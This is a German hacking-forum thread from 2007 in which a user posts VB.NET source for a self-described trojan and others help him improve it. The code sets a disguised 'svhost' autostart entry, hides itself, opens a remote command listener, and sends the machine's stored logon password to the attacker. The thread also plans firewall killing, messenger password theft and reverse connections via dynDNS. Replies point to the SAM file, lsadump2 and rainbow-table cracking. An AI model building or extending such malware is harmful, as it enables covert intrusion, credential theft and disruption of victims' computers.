 Verfasst am: 15.01.2007 16:54 |
 |
|
| Kaito |
|
|
 |
| Anmeldedatum: 12.01.2006 |
| Beitrge: 80 |
| Wohnort: /desktop/papierkorb |
|
|
|
|
 |
|
1. Wei einer wie ich einen Wert auslese? ich will nhmlich das psw des aktuellen users auslesen
2. wisst ihr wo die psws von icq, msn usw gespeichert werden?
3. Wie kann ich die Maus (, Tastatur) blockieren?
wenn ich die Maus so blocke:
| Code: |
Declare Function ShowCursor Lib "user32" (ByVal _bShow As Long) As Long
Windows.Forms.Cursor.Hide()
|
kommt ein fehler
ich hoffe ihr knnt mir helfen
cya Kaito |
|
|
|
|
 | |  |
| Verfasst am: 25.01.2007 18:43 |
|
|
| Kaito |
|
|
|
| Anmeldedatum: 12.01.2006 |
| Beitrge: 80 |
| Wohnort: /desktop/papierkorb |
|
|
|
|
|
|
hi
es whre schon schn wenn ich mal eine antwort erhalte^^
hier der vorlufige code (mit ein paar fehlern):
| Code: | Option Explicit On
Imports System.net
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Dim path = My.Application.Info.DirectoryPath.ToString()
Dim appl = My.Application.Info.AssemblyName & ".exe"
Dim regkey = path & "\" & appl
My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "svhost", regkey)
My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "svhost", regkey)
Me.Visible = False
Dim objServer As New Sockets.TcpListener(IPAddress.Any, 23) 'Server auf Ip, Port setzen
objServer.Start() 'Server Starten
Do
Threading.Thread.Sleep(100) 'auf Client warten
Loop Until objServer.Pending
Dim objClient As Sockets.TcpClient = objServer.AcceptTcpClient
Dim objStream As Sockets.NetworkStream = objClient.GetStream
Dim data As Byte() = System.Text.Encoding.ASCII.GetBytes("Befehl: ")
objStream.Write(data, 0, data.Length)
Dim input(0) As Byte
Do
Dim blnEnter As Boolean = False
Dim strb As New System.Text.StringBuilder
Do
objStream.Read(input, 0, 1)
If input(0) = 10 Then
blnEnter = True
ElseIf input(0) <> 13 Then 'enter besteht aus einer 10 (line feed) und einer 13 (carriage return) (sinnloserweise finde ich) die 13 wird hier ignoriert weggesplt
strb.Append(System.Text.Encoding.ASCII.GetString(input))
End If
Loop Until blnEnter
Dim output As String = strb.ToString
'MsgBox(output)
If output.StartsWith("MSG") Then
MsgBox(output.Substring(4))
End If
Select Case output
Case "SHUTDOWN"
Try
Process.Start("shutdown -s -f -t 3")
Catch ex As Exception
Process.Start("shutdown -s -f")
End Try
Case "RESTART"
Try
Process.Start("shutdown -r -f -t 3")
Catch ex As Exception
Process.Start("shutdown -r -f")
End Try
Case "FEHLER"
Dim i
For i = 1 To 1000
MsgBox("Schwerer Ausnahmefehler: x0723D6F5S7 & x0056F52f", MsgBoxStyle.Critical)
Next
Case "BEEP"
Dim i
For i = 1 To 1000
My.Computer.Audio.PlaySystemSound(Media.SystemSounds.Beep)
Threading.Thread.Sleep(300)
Next
Case "PSW"
Dim pswcomp = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", "DefaultPassword", "")
Dim psw As Byte() = System.Text.Encoding.ASCII.GetBytes("PSW des Computers: " & pswcomp)
objStream.Write(psw, 0, psw.Length)
End Select
Loop
End Sub
End Class
|
weitere funktionen bei denen ich noch nich herraus gefunden habe wie ich das hinbiegen soll ist:
- CD Tray ffnen und schlieen
- Blue Screen an/aus (also eigendliche alles Blockieren tastatur und maus ausblenden und dann ein form maximieren und blau frben - so wrd ichs machen)
- Durche den Router (das wei ich schon wie ichs mach also vom opfer connecten an meine ip )
- Firewalls killen (ich htte mir vorgestellt: eine liste mit allen bekannten firewalls und dann die prozesse killen)
- Programm in den Autostartordner kopieren (wei die funktion nich^^)
- Updaten (das is das wichtigste - zuerst wollt ichs mit der vb internen update funktion machen aber das is nich sooo gut)
- Passwrter auslesen: das computer psw les ich aus der registry aus:
| Code: | | Dim pswcomp = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", "DefaultPassword", "") |
aber in der schule geht das nicht weil wir da auf die registry nich zugreifen knnen
- MSN, ICQ, Aim und sonstige passwrter ich find einfach net raus wo die gespeichert werden
- das das Programm nach raus connecten kann braucht es meine ip also -> also der client geht auf einen ftp server und schreibt in eine ip.txt meine ip, der server wiederum liest sie aus und connectet. wenn der client
runterfhrt wird die ip.txt gelscht das sagt dem server dann das er nicht connecten kann aber wenn ich das mit
| Code: |
My.Computer.Network.DownloadFile("http://htnrevision.ht.funpic.de/", "ip.txt", "htnrevision", "??????")
|
mache kommt eine ip.txt auf meine pc aber da ist nix drinn
das kann er schon alles(nich allzuviel):
- Beliebige MSg boxen senden
- Runterfahren
- Restarten
- Fehlermeldungen anzeigen (1000^^)
- Beeps ausgeben (1000^^)
- PSW auslesen
also ich hoffe ihr knnt mir meine Fragen beantworten
cya Kaito |
|
Zuletzt bearbeitet von Kaito am 11.02.2007 13:59, insgesamt einmal bearbeitet
_________________
Meine Seite:
www.sharerama.de
Sie ist noch im Aufbau |
|
|
|
| | |
| Verfasst am: 25.01.2007 19:03 |
|
|
| duddits |
|
 |
|
| Anmeldedatum: 03.01.2006 |
| Beitrge: 569 |
| Wohnort: /proc |
|
|
|
|
|
|
Hi,
ich kann zwar kein VB.NET oder vergleichbares aber wenn du z.B. dienste einer Firewall oder einer Antivierensoftware abschiesen mchtes, brauchst du auch die entsprechenden Rechte.
Am besten wre es wenn du in dir einige Schwchen des Eventhandling von Windows zu nutze machst. Ob das mit VB realisierbar ist, wei ich nicht.
Ganz interessant sollte fr dich folgendes schon lteres Video sein:
http://ulm.ccc.de/ChaosSeminar/2004/12_Personal_Firewalls?highlight=%28ChaosSeminar%2F2004%29
Aber es muss gesagt sein das die Vortrger nicht umbedingt kompetent erscheinen (wieviele bits hatte gleich noch eine IP ?).
Beachten solltes du noch, das es einem Benutzer auch nicht gestattet sein kann, den Rechner herunterzufahren zu knnen.
mfg duddits |
|
|
|
|
| | |
| Verfasst am: 25.01.2007 19:22 |
|
|
| Phara0h |
|
 |
|
| Anmeldedatum: 31.12.2005 |
| Beitrge: 357 |
| Wohnort: /dev/RL |
|
|
|
|
|
|
| Mein Tipp: Leg dir ne dynDNS zu und lass den Trojaner auf die connecten... Dann hast du das Problem mit der ip.txt nicht mehr... |
|
_________________
 |
|
|
|
| Verfasst am: 25.01.2007 22:02 |
|
|
| Lukas |
|
|
|
| Anmeldedatum: 31.12.2005 |
| Beitrge: 257 |
| Wohnort: Wien |
|
|
|
|
|
|
Hi, Duddits!
Das ist ein guter Link, den kenn ich schon aber leider sind da viele Sachen nicht mehr aktuell.
Autoklicker, und httpshell sind noch mglich aber der Rest drfte nicht mehr mglich sein.
@Kaito:
Konzentrier dich nicht nur auf die Prozesse  , SPF wird zB auch nicht im TM angezeigt.
Mfg |
|
|
|
|
| Verfasst am: 26.01.2007 15:32 |
|
|
| Kaito |
|
|
|
| Anmeldedatum: 12.01.2006 |
| Beitrge: 80 |
| Wohnort: /desktop/papierkorb |
|
|
|
|
|
|
Danke fr die Antworten.
das Video ist sehr interresant habs aber nicht ganz angeschaut war mir zu lange
@pharaoh ich hab ne dyndns kaito.selfip.net
@lukas ich versteh nicht ganz was du mit spf meinst
cu Kaito |
|
|
|
|
| Verfasst am: 26.01.2007 15:41 |
|
|
| Phara0h |
|
|
|
| Anmeldedatum: 31.12.2005 |
| Beitrge: 357 |
| Wohnort: /dev/RL |
|
|
|
|
|
|
| SPF is anscheinend ein Programm, das nicht als Task, sondern als Service luft |
|
_________________
|
|
|
|
| Verfasst am: 26.01.2007 15:46 |
|
|
| Kaito |
|
|
|
| Anmeldedatum: 12.01.2006 |
| Beitrge: 80 |
| Wohnort: /desktop/papierkorb |
|
|
|
|
|
|
ich wei schon was es ist^^
sygatepersonalfirewall
cu |
|
|
|
|
| Verfasst am: 28.01.2007 19:08 |
|
|
| Kaito |
|
|
|
| Anmeldedatum: 12.01.2006 |
| Beitrge: 80 |
| Wohnort: /desktop/papierkorb |
|
|
|
|
|
|
hi
wisst ihr vielleicht wie das msn passwort verschlsselt ist?
ich hatte mal eine vbs datei die das entschlsseln konnte aber ich find sie nichtmehr -.-
und wisst ihr wo das icq psw gespeichert wird und ob das verschlsselt wird?
das passwort vom computer lies ich aus der registry raus aus:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword
ich wei aber nich ob das stimmt weil in der schule gehts nicht.
cya |
|
|
|
|
| | |
| Verfasst am: 28.01.2007 19:23 |
|
|
| 4lx |
|
|
|
| Anmeldedatum: 02.01.2006 |
| Beitrge: 369 |
| Wohnort: /offtopic |
|
|
|
|
|
|
Hi,
ich habe Trillian, da wird das Passwort verschlsselt in folgender Datei gespeichert:
~Trillian\users\default\aim.ini
Von ICQ habe ich leider keine Ahnung.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword
existiert bei mir nicht.^^
Wird der Eintrag vielleicht nur bei Autologin gespeichert?
berlicherwese findest du die Passwrter aber in:
C:\WINDOWS\system32\config\SAM |
|
_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon
"Terrorismus ist die Zerstrung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof |
|
|
|
| | |
| Verfasst am: 28.01.2007 19:26 |
|
|
| Cerox |
|
 |
|
| Anmeldedatum: 31.12.2005 |
| Beitrge: 782 |
| Wohnort: Engelskirchen |
|
|
|
|
|
|
Ja, so ist es:
http://www.winstuff.de/show_registry.html?sid=43
Du solltest bedenken, dass die wenigsten Benutzer den Autologon benutzen, weil sie den Computer in der Familie verwenden und jeder seinen eigenen Benutzer hat. Meistens haben jedoch trotzdem alle Administratorrechte. |
|
|
|
|
| Verfasst am: 28.01.2007 19:33 |
|
|
| Kaito |
|
|
|
| Anmeldedatum: 12.01.2006 |
| Beitrge: 80 |
| Wohnort: /desktop/papierkorb |
|
|
|
|
|
|
ich hab aber kein autologin aktiviert^^
egal aber die sam ist doch verschlsselt oder?
der lukas hat mir ein programm gezeigt lsadump2 das funkt aber nicht
jetzt hab ich mir gedacht das man vielleicht able dafr verwenden knnte?
wo das msn psw gespeichert wird wei ich schon aber wie es verschlsselt wird ist die frage
cya Kaito |
|
|
|
|
| | |
| Verfasst am: 28.01.2007 19:51 |
|
|
| 4lx |
|
|
|
| Anmeldedatum: 02.01.2006 |
| Beitrge: 369 |
| Wohnort: /offtopic |
|
|
|
|
|
|
Probier's doch aus. 
Du hast ja wahrscheinlich MSN, also setzt doch dein Passwort auf einen Wert, der hchtwahrscheinlich in einer Rainbowtable ist, z.B. "test", und zhle dann die Zeichen des Hashes um eine Verschlsselung in die engere Auswahl ziehen zu knnen, dann packste das in die Suchmaschine der erwhnten Datebank fr Rainbowtables und wenn dann dein gewhltes Passwort wieder herauskommt, weite ja was es ist.  |
|
_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon
"Terrorismus ist die Zerstrung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof |
|
|
|
| Verfasst am: 28.01.2007 20:33 |
|
|
| Kaito |
|
|
|
| Anmeldedatum: 12.01.2006 |
| Beitrge: 80 |
| Wohnort: /desktop/papierkorb |
|
|
|
|
|
|
|
|
|
|
| Verfasst am: 19.03.2021 04:19 |
|
|
| warganic |
|
|
|
| Anmeldedatum: 26.02.2021 |
| Beitrge: 258570 |
|
|
|
|
|
|
|
|
|
|
|
| | |
| Foren-bersicht » Programmierung |
Du kannst keine Beitrge in dieses Forum schreiben.
Du kannst auf Beitrge in diesem Forum nicht antworten.
Du kannst deine Beitrge in diesem Forum nicht bearbeiten.
Du kannst deine Beitrge in diesem Forum nicht lschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
|
Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 2
Gehe zu Seite 1, 2 Weiter
|
|
|
|
|
